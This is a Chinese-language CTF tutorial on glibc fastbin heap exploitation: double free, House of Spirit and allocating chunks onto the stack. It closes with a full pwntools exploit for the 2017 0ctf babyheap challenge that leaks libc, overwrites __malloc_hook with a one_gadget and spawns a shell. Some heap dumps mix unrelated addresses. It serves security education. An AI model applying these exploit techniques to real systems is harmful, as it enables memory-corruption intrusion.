堆溢出-Fastbin Attack

原理

利用的前提是：

存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞
漏洞发生于 fastbin 类型的 chunk 中

fastbin使用单链表维护释放的堆块，由 fastbin 管理的 chunk 即使被释放，其 next_chunk 的 prev_inuse 位也不会被清空。

/* Allocate three chunks of the same size and free them one after another,
   so that the memory dumps that follow can show how the freed chunks are
   chained together through their first data word (fd). */
int main(void)
{
    void *chunk1,*chunk2,*chunk3;
    chunk1=malloc(0x30);
    chunk2=malloc(0x30);
    chunk3=malloc(0x30);
    // release the chunks in allocation order; chunk3 is freed last
    free(chunk1);
    free(chunk2);
    free(chunk3);
    return 0;
}


///////释放前
0x602000:   0x0000000000000000  0x0000000000000041 <=== chunk1
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000041 <=== chunk2
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000041 <=== chunk3
0x602090:   0x0000000000000000  0x0000000000000000
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000020f41 <=== top chunk
    

///////释放后
0x602000:   0x0000000000000000  0x0000000000000041 <=== chunk1
0x602010:   0x0000000000000000  0x0000000000000000 ----------------->0x000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000041 <=== chunk2
0x602050:   0x0000000000602000  0x0000000000000000 ----------------->0x602000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000041 <=== chunk3
0x602090:   0x0000000000602040  0x0000000000000000 ----------------->0x602040
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000020f41 <=== top chunk    
    
/////////chunk 3、2、1 构成了一个单链表
Fastbins[idx=2, size=0x30,ptr=0x602080]
===>Chunk(fd=0x602040, size=0x40, flags=PREV_INUSE)
===>Chunk(fd=0x602000, size=0x40, flags=PREV_INUSE)
===>Chunk(fd=0x000000, size=0x40, flags=PREV_INUSE)

Fastbin Double Free

多次分配可以从 fastbin 链表中取出同一个堆块，相当于多个指针指向同一个堆块，结合堆块的数据内容可以实现类似于类型混淆 (type confusion) 的效果。

Fastbin Double Free 成功利用的条件：

fastbin 的堆块被释放后 next_chunk 的 prev_inuse 位不会被清空
fastbin 在执行 free 的时候仅验证了 main_arena 直接指向的块，即链表指针头部的块。对于链表后面的块，并没有进行验证。

如果按顺序malloc了chunk0,chunk1，然后连续两次free(chunk0)则会被_int_free检测到从而导致“已放弃 (核心已转储)”，如果在 chunk0释放后，再释放 chunk1，这样 main_arena 就指向 chunk1 而不是 chunk0 了，此时再去释放 chunk0 就不再会被检测到。

/* Fastbin double-free demo: chunk0 is freed twice, with chunk1 freed in
   between so that chunk0 is not the most recently freed chunk when it is
   freed the second time. */
int main(void)
{
    void *chunk0,*chunk1;
    chunk0=malloc(0x10);
    chunk1=malloc(0x10);

    free(chunk0);
    free(chunk1);   // chunk1 is now the most recently freed chunk
    free(chunk0);   // second free of chunk0: chunk0 ends up in the list twice
    return 0;
}


+------------+
| fastbinY[i]|
+-----+------+
      |
      v
+-----+------+
|   chunk0   +<-----+
+-----+------+      |
      |             |
      v             |
+-----+------+      |
|   chunk1   +------+
+------------+

Code

// 再进行一次 malloc() 分配到 chunk0，修改其 fd 指针
//伪造一个 fake chunk，
//往 chunk0 的数据段中写入 fake chunk 的地址，
//就可以将 chunk0 的 fd 指向 fake chunk，
//即将 fake chunk 添加进了 fastbin 链表中。


       +------------+
+------+ fastbinY[i]|
|      +------------+       +-------------+
|                           |             |
|            +------------->+  fake chunk |
|            |              |             |
|      +-----+------+       +-------------+
|      |   chunk0   +<-----+
|      +------------+      |
|                          |
|      +------------+      |
+----->+   chunk1   +------+
       +------------+

Code

//再进行两次malloc()，
//依次分配到 chunk1 和 chunk0，

	   +------------+
+------+ fastbinY[i]|
|      +------------+       +-------------+
|                           |             |
|            +------------->+  fake chunk |
|            |              |             |
|      +-----+------+       +-------------+
+----->+   chunk0   |
       +------------+

       +------------+
       |   chunk1   |
       |  allocated |
       +------------+

Code

//由于之前将 chunk0 的 fd 指针指向了 fake chunk，
//并且 chunk0 还呆在 fastbin 里，
//所以第三次 malloc()时，
//malloc()会将 chunk0 的 fd 赋给 fastbinY[i]，
//此时只要再进行一次malloc()就可以分配到 fake chunk 了。

+------------+
|            |
| fastbinY[i]|
|            |
+-----+------+       +-------------+
      |              |             |
      +------------->+  fake chunk |
                     |             |
+------------+       +-------------+
|            |
|   chunk0   |
|  allocated |
+------------+



+------------+
|            |
|   chunk1   |
|  allocated |
+------------+

House Of Spirit

House Of Spirit 是 The Malloc Maleficarum 中的一种技术。

主要意思是我们想要控制的区域控制不了，但它前面和后面都可以控制，所以伪造好数据将它释放到fastbin里面，后面将该内存区域当做堆块申请出来，致使该区域被当做普通的内存使用，从而目标区域就变成了可控的了。

核心在于在目标位置处伪造 fastbin chunk，并将其释放，从而达到分配指定地址的 chunk 的目的。

需要绕过的检测:

fake chunk 的 ISMMAP 位不能为 1，因为 free 时，如果是 mmap 的 chunk，会单独处理。
fake chunk 地址需要对齐， MALLOC_ALIGN_MASK
fake chunk 的 size 大小需要满足对应的 fastbin 的需求，同时也得对齐。
fake chunk 的 next chunk 的大小必须大于 2*SIZE_SZ，同时必须小于 av->system_mem。
fake chunk 对应的 fastbin 链表头部不能是该 fake chunk，即不能构成 double free 的情况。

想要使用该技术分配 chunk 到指定地址，其实并不需要修改指定地址的任何内容，关键是要能够修改指定地址的前后的内容使其可以绕过对应的检测。

#include <stdio.h>
#include <stdlib.h>

/*
 * House of Spirit demonstration.
 *
 * Builds a fake fastbin-sized chunk inside a stack array, passes a pointer
 * into that array to free(), and then shows that the next malloc() of the
 * matching size returns the stack address.
 *
 * Returns 0. All output goes to stderr.
 */
int main()
{
    fprintf(stderr, "This file demonstrates the house of spirit attack.\n");

    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    malloc(1);

    fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
    unsigned long long *a;
    // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    // sizeof yields a size_t, so it is printed with %zu; %p requires a void * argument.
    fprintf(stderr, "This region (memory of length: %zu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), (void *)&fake_chunks[1], (void *)&fake_chunks[7]);

    fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size

    fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
    // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
    fake_chunks[9] = 0x1234; // nextsize

    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", (void *)&fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
    // The pointer handed to free() is the user-data address, one word past the size field.
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", (void *)&fake_chunks[1], (void *)&fake_chunks[2]);
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
    return 0;
}

Code

➜  how2heap git:(master) ./house_of_spirit
This file demonstrates the house of spirit attack.
Calling malloc() once so that it sets up its memory.
We will now overwrite a pointer to point to a fake 'fastbin' region.
This region (memory of length: 80) contains two chunks. The first starts at 0x7ffd9bceaa58 and the second at 0x7ffd9bceaa88.
This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.
... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end.
The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.
Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, 0x7ffd9bceaa58.
... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7ffd9bceaa58, which will be 0x7ffd9bceaa60!
malloc(0x30): 0x7ffd9bceaa60

Alloc to Stack

核心点在于劫持 fastbin 链表中 chunk 的 fd 指针，把 fd 指针指向我们想要分配的栈上，从而实现控制栈中的一些关键数据，比如返回地址等。

通过该技术可以把 fastbin chunk 分配到栈中，从而控制返回地址等关键数据。要实现这一点需要劫持 fastbin 中 chunk 的 fd 域，把它指到栈上，当然同时需要栈上存在有满足条件的 size 值。

/* Stand-in for a heap chunk header, used by the demo below to place a fake
   chunk on the stack. The fields are named after the previous-size and size
   words followed by the fd/bk link words. */
typedef struct _chunk
{
    long long pre_size;
    long long size;     // the only field the demo initialises (to 0x21)
    long long fd;
    long long bk;
} CHUNK,*PCHUNK;

/*
 * Alloc-to-stack demonstration.
 *
 * Frees a fastbin-sized chunk, then deliberately writes through the stale
 * pointer so that the freed chunk's fd word holds the address of a fake
 * chunk on the stack. The second malloc(0x10) afterwards is expected to
 * return memory inside stack_chunk.
 */
int main(void)
{
    CHUNK stack_chunk;

    void *chunk1;
    void *chunk_a;

    // Fake size field: 0x21 is the size word of a real malloc(0x10) chunk.
    stack_chunk.size=0x21;
    chunk1=malloc(0x10);

    free(chunk1);

    // Intentional use-after-free write: redirect the freed chunk's fd to the
    // stack. The address is cast explicitly because the slot is written as an
    // integer; assigning a pointer without the cast is a constraint violation.
    *(long long *)chunk1=(long long)&stack_chunk;
    malloc(0x10);               // hands chunk1 back out again
    chunk_a=malloc(0x10);       // expected to point into stack_chunk
    (void)chunk_a;              // only inspected in a debugger
    return 0;
}

Arbitrary Alloc

与 Alloc to stack 是完全相同的，只要满足目标地址存在合法的 size 域，就可以把 chunk 分配到任意的可写内存中，比如 bss、heap、data、stack 等等。

例 2017 0ctf babyheap

功能

  puts("1. Allocate");
  puts("2. Fill");
  puts("3. Free");
  puts("4. Dump");
  puts("5. Exit");
  return printf("Command: ");

/*
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
*/

漏洞点

/* Decompiler output for the "Fill" menu handler.
   Reads an index and accepts it only in the range 0..15, then checks that the
   first field of the 24-byte entry at a1 + 24*index equals 1. If so it reads
   a size and, when that is positive, passes the entry's field at offset 16
   together with the size to sub_11B2.
   NOTE(review): sub_11B2 is not shown here; presumably it reads that many
   bytes into the buffer -- confirm against the binary. */
__int64 __fastcall Fill(__int64 a1)
{
  __int64 result; // rax
  int v2; // [rsp+18h] [rbp-8h]
  int v3; // [rsp+1Ch] [rbp-4h]

  printf("Index: ");
  result = Read();
  v2 = result;
  if ( result >= 0 && result <= 15 )
  {
    result = *(24LL * result + a1);
    if ( result == 1 )
    {
      printf("Size: ");
      result = Read();
      v3 = result;
      if ( result > 0 )
      {
        printf("Content: ");
        result = sub_11B2(*(24LL * v2 + a1 + 16), v3);   // v3 comes straight from the user, so an arbitrary length can be read
      }
    }
  }
  return result;
}

利用

基本利用思路

利用 unsorted bin 地址泄漏 libc 基地址。
利用 fastbin attack 将 chunk 分配到 malloc_hook 附近。

leak libc基地址

构造一个 small bin chunk。在将该 chunk 释放到 unsorted bin 的同时，也需要让另外一个正在使用的 chunk 可以同时指向该 chunk 的位置才可以进行泄漏。

python

# 1. leak libc base
allocate(0x10)  # idx 0, 0x00
allocate(0x10)  # idx 1, 0x20
allocate(0x10)  # idx 2, 0x40
allocate(0x10)  # idx 3, 0x60
allocate(0x80)  # idx 4, 0x80
# free idx 1 then idx 2; the last freed chunk becomes the list head,
# so fastbin[0]->idx2->idx1->NULL
free(1)
free(2)

Code

堆当前布局
pwndbg> x/20xg 0x560ce09d8290
0x560ce09d8290:	0x0000000000000000	0x0000000000000021 ====> chunk0
0x560ce09d82a0:	0x0000000000000000	0x0000000000000000
0x560ce09d82b0:	0x0000000000000000	0x0000000000000021 ====> chunk1(free)
0x559499e682c0:	0x0000000000000000	0x0000559499e68010
0x560ce09d82d0:	0x0000000000000000	0x0000000000000021 ====> chunk2(free)
0x559499e682e0:	0x0000559499e682c0	0x0000559499e68010
0x560ce09d82f0:	0x0000000000000000	0x0000000000000021 ====> chunk3
0x560ce09d8300:	0x0000000000000000	0x0000000000000000
0x560ce09d8310:	0x0000000000000000	0x0000000000000091 ====> chunk4
0x560ce09d8320:	0x0000000000000000	0x0000000000000000

此时使用 fill 覆盖 fastbin 头部 chunk 的 fd 值，将其改写成 small chunk 的地址，那么通过两次 alloc，先将 small chunk 放入 fastbin，再将其取出来，获得指向它的 index。要这么做必须绕过 malloc 的安全检查。

chunksize 的计算方法是 victim->size & ~(SIZE_BITS)，而对应的 fastbin index 计算方法为 ((size) >> (SIZE_SZ == 8 ? 4 : 3)) - 2，这里 64 位平台对应的 SIZE_SZ 是 8，则 fastbin_index 为 (size >> 4) - 2，那么我们将 small chunk 的 size 域改写成 0x21 即可。

python

# Overflow from idx 0: keep the headers of chunk1 and chunk2 intact (size 0x21)
# and overwrite only the low byte of chunk2's fd with 0x80, the heap offset
# of the 0x80-sized chunk (idx 4).
payload = p64(0)*3
payload += p64(0x21)
payload += p64(0)*3
payload += p64(0x21)
payload += p8(0x80)
fill(0, payload)

# Overflow from idx 3: rewrite idx 4's size field to 0x21 so that it passes
# the fastbin size check when it is handed out.
payload = p64(0)*3
payload += p64(0x21)
fill(3, payload)

# Two allocations: the first takes the fastbin head, the second returns the
# chunk that the overwritten fd points to. The helper is named allocate().
allocate(0x10)
allocate(0x10)

Code

pwndbg> x/20xg 0x55db5f3d4290
0x55db5f3d4290:	0x0000000000000000	0x0000000000000021
0x55db5f3d42a0:	0x0000000000000000	0x0000000000000000
0x55db5f3d42b0:	0x0000000000000000	0x0000000000000021
0x55db5f3d42c0:	0x0000000000000000	0x0000000000000000
0x55db5f3d42d0:	0x0000000000000000	0x0000000000000021
0x55db5f3d42e0:	0x000055db5f3d4280	0x000055db5f3d4010 --+ chunk2
0x55db5f3d42f0:	0x0000000000000000	0x0000000000000021   |
0x55db5f3d4300:	0x0000000000000000	0x0000000000000000   |
0x55db5f3d4310:	0x0000000000000000	0x0000000000000021 <-+ chunk4
0x55db5f3d4320:	0x0000000000000000	0x0000000000000000

可以看到 index[2] 存放的是 small chunk 的地址，此时将 small chunk 的 size 改写回来，将其释放掉就可以 dump 出来了。

python

# Restore idx 4's real size (0x91) through the overflow from idx 3.
payload = p64(0)*3 + p64(0x91)
fill(3, payload)
# Extra 0x80 allocation placed after idx 4 before it is freed
# (presumably to keep the freed chunk from merging with the top chunk).
allocate(0x80)
free(4)

def offset_bin_main_arena(idx):
    """Return the byte offset inside main_arena that a chunk in bin `idx` points at.

    The layout summed up here is the one spelled out by the per-line
    comments: a 4-byte lock, 4-byte flags, 10 fastbin pointers, then the top
    and last_remainder pointers, followed by two pointers per bin.

    :param idx: bin index (0 is the first bin).
    :return: integer offset in bytes; depends on ``context.word_size``.
    """
    # Floor division keeps every term an int, so hex() works on the result.
    word_bytes = context.word_size // 8
    offset = 4  # lock
    offset += 4  # flags
    offset += word_bytes * 10  # offset fastbin
    offset += word_bytes * 2  # top,last_remainder
    offset += idx * 2 * word_bytes  # idx
    offset -= word_bytes * 2  # bin overlap
    return offset

# idx 2 still refers to the freed small chunk, so dumping it leaks the fd
# pointer written into the chunk.
dump(2)
p.recvuntil('Content: ')
unsortedbin_addr = u64(p.recv(8))
# The unsorted bin is bin index 0.
# NOTE(review): offset_bin_main_arena() relies on context.word_size being 64
# for this amd64 target -- confirm the context is configured accordingly.
offset_unsortedbin_main_arena = offset_bin_main_arena(0)
main_arena = unsortedbin_addr - offset_unsortedbin_main_arena
log.success('main arena addr: ' + hex(main_arena))
main_arena_offset = 0x3c4b20
libc_base = main_arena - main_arena_offset
log.success('libc base addr: ' + hex(libc_base))

main_arena_offset脚本 https://github.com/bash-c/main_arena_offset

Code

$ bash main_arena ./x64_libc.so.6 
[+]libc version : glibc 2.23
[+]build ID : BuildID[sha1]=b5381a457906d279073822a5ceb24c4bfef94ddb
[+]main_arena_offset : 0x3c4b20

分配 chunk 到 malloc_hook 附近

由于在 malloc_hook 附近可以错位构造出 size 域为 0x7f 的 fake chunk（对应 0x70 大小的 fastbin），所以申请的数据区域大小为 0x60。这里我们再次申请的时候，对应 fastbin 链表中没有相应大小的 chunk，所以根据堆分配器规则，它会依次处理 unsorted bin 中的 chunk，将其放入到对应的 bin 中，之后会再次尝试分配 chunk，因为之前释放的 chunk 比当前申请的 chunk 大，所以可以从其前面分割出来一块。所以 idx2 仍然指向该位置，那么我们可以使用类似的办法先释放申请到的 chunk，然后再次修改 fd 指针为 fake chunk 即可。此后将 malloc_hook 处的指针改写为 one_gadget 的地址，再次调用 malloc 即可触发 one_gadget。

Code

pwndbg> x/32xw (long long)(&main_arena)-0x40
0x7fa8a92a6b40 <_IO_wide_data_0+224>:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fa8a92a6b50 <_IO_wide_data_0+240>:	0xa92a7f60	0x00007fa8	0x00000000	0x00000000
0x7fa8a92a6b60 <__memalign_hook>:	0xa91595a0	0x00007fa8	0xa9159c20	0x00007fa8
0x7fa8a92a6b70 <__malloc_hook>:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fa8a92a6b80 <main_arena>:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fa8a92a6b90 <main_arena+16>:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fa8a92a6ba0 <main_arena+32>:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fa8a92a6bb0 <main_arena+48>:	0x00000000	0x00000000	0x00000000	0x00000000

python

allocate(0x60)
free(4)
# edit idx4's fd (through idx 2, which refers to the same chunk) to point to
# the fake chunk
fake_chunk_addr = main_arena - 0x33
fake_chunk = p64(fake_chunk_addr)
# fill() takes (idx, payload) and sends the length itself.
fill(2, fake_chunk)

allocate(0x60)  # idx 4
allocate(0x60)  # idx 6

one_gadget_addr = libc_base + 0x4526a
# 0x13 padding bytes precede the hook pointer; a bytes literal is used so
# that it can be concatenated with the result of p64().
payload = b'a' * 0x13 + p64(one_gadget_addr)
fill(6, payload)
# trigger malloc_hook
allocate(0x100)
p.interactive()

exp

python

from pwn import *
context.log_level = "debug"
p=process('./babyheap_0ctf_2017')

def allocate(size):
    """Select menu entry 1 and send the requested allocation size."""
    p.sendlineafter('Command: ', '1')
    p.sendline(str(size))

def fill(idx,payload):
    """Select menu entry 2, then send the index, the payload length and the raw payload."""
    p.sendlineafter('Command: ', '2')
    for field in (idx, len(payload)):
        p.sendline(str(field))
    # The payload itself goes out without a trailing newline.
    p.send(payload)

def free(idx):
    """Select menu entry 3 and send the index of the entry to release."""
    p.sendlineafter('Command: ', '3')
    p.sendline(str(idx))

def dump(idx):
    """Select menu entry 4 and answer the index prompt; reading the output is left to the caller."""
    p.sendlineafter('Command: ', '4')
    p.sendlineafter('Index: ', str(idx))

# 1. leak libc base
allocate(0x10)  # idx 0, 0x00
allocate(0x10)  # idx 1, 0x20
allocate(0x10)  # idx 2, 0x40
allocate(0x10)  # idx 3, 0x60
allocate(0x80)  # idx 4, 0x80
# free idx 1 then idx 2; the last freed chunk becomes the list head,
# so fastbin[0]->idx2->idx1->NULL
free(1)
free(2)

# overflow from idx 0: keep chunk1/chunk2 headers (size 0x21) and overwrite
# the low byte of chunk2's fd with 0x80, the heap offset of idx 4
payload = p64(0)*3
payload += p64(0x21)
payload += p64(0)*3
payload += p64(0x21)
payload += p8(0x80)
fill(0, payload)

# overflow from idx 3: set idx 4's size field to 0x21
payload = p64(0)*3
payload += p64(0x21)
fill(3, payload)

# the second allocation returns the chunk the overwritten fd points to
allocate(0x10)
allocate(0x10)

# restore idx 4's size to 0x91, then free it
payload = p64(0)*3 + p64(0x91)
fill(3, payload)
allocate(0x80)
free(4)

def offset_bin_main_arena(idx):
    """Return the byte offset inside main_arena that a chunk in bin `idx` points at.

    The layout summed up here is the one spelled out by the per-line
    comments: a 4-byte lock, 4-byte flags, 10 fastbin pointers, then the top
    and last_remainder pointers, followed by two pointers per bin.

    :param idx: bin index (0 is the first bin).
    :return: integer offset in bytes; depends on ``context.word_size``.
    """
    # Floor division keeps every term an int, so hex() works on the result.
    word_bytes = context.word_size // 8
    offset = 4  # lock
    offset += 4  # flags
    offset += word_bytes * 10  # offset fastbin
    offset += word_bytes * 2  # top,last_remainder
    offset += idx * 2 * word_bytes  # idx
    offset -= word_bytes * 2  # bin overlap
    return offset

# idx 2 still refers to the freed small chunk, so dumping it leaks the fd
# pointer written into the chunk.
dump(2)
p.recvuntil('Content: ')
unsortedbin_addr = u64(p.recv(8))
log.success(hex(unsortedbin_addr))
# The target is amd64; offset_bin_main_arena() reads context.word_size, which
# must be 64 for the offset to be computed with 8-byte words.
context.arch = 'amd64'
# The unsorted bin is bin index 0.
main_arena = unsortedbin_addr - offset_bin_main_arena(0)
log.success('main arena addr: ' + hex(main_arena))
main_arena_offset = 0x3c4b20
libc_base = main_arena - main_arena_offset
log.success('libc base addr: ' + hex(libc_base))

allocate(0x60)
free(4)
# edit idx4's fd (through idx 2, which refers to the same chunk) to point to
# the fake chunk
fake_chunk_addr = main_arena - 0x33
log.success(hex(fake_chunk_addr))
fake_chunk = p64(fake_chunk_addr)
fill(2,  fake_chunk)

allocate(0x60)  # idx 4
allocate(0x60)  # idx 6

one_gadget_addr = libc_base + 0x4526a
# 0x13 padding bytes precede the hook pointer; a bytes literal is used so
# that it can be concatenated with the result of p64().
payload = b'a' * 0x13 + p64(one_gadget_addr)
fill(6,  payload)
# trigger malloc_hook
allocate(0x100)
p.interactive()